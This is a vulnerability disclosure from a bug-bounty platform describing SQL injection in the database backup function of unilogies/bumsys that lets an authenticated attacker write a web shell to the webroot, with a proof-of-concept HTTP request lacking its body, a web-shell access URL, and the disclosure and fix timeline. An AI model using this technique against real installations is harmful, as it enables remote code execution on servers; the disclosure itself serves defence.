SQL Injection leads to code execution in unilogies/bumsys


Reported on

Feb 28th 2023


This vulnerability allows the attacker to leverage a SQL injection attack in the database backup functionality to write arbitrary data to an arbitrary file on disk anywhere where the user can write. This includes the webroot in a default installation allowing the attack to place a web shell in a location they can reach from the server.

Proof of Concept

This vulnerability requires an active session of an account. The cookies and the csrf token need to be replaced in the http request below. This will place a file called shell.php into the webroot where the attacker can access it via http://localhost:8081/shell.php?c=id to execute the id command.

POST /xhr/?module=settings&page=generateDatabaseBackup HTTP/1.1
Host: localhost:8081
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
X-CSRF-TOKEN: 4a07ceabd1734243fbd0a9cf714b65452551f0e6
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8081/home/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CRM-40d1b2d83998fabacb726e5bc3d22129=12j4f7uk8bi3o77pun4dd7e3hd; __f8b4221bcc40754ca24ed6adc27973c785a8e4cd=db3fd51122bad08f449fc62eee05da13; eid=1
Connection: close
Content-Length: 180



Remote code execution

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 3 months ago
Khurshid Alam validated this vulnerability 3 months ago

Good finding. Will fix soon. Thank you

Joe Rozner has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam
3 months ago

Hello, we have already transfer the backup system to module/settings/backup.php#L12.

Could you please confirm that, is the issue still exists? Thank you.

Joe Rozner
3 months ago


Just checked this against the most recent commit and the exploit still works as described

Khurshid Alam marked this as fixed in 3.1.1 with commit 86e29d a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
ajax.php#L1617-L1720 has been validated
to join this conversation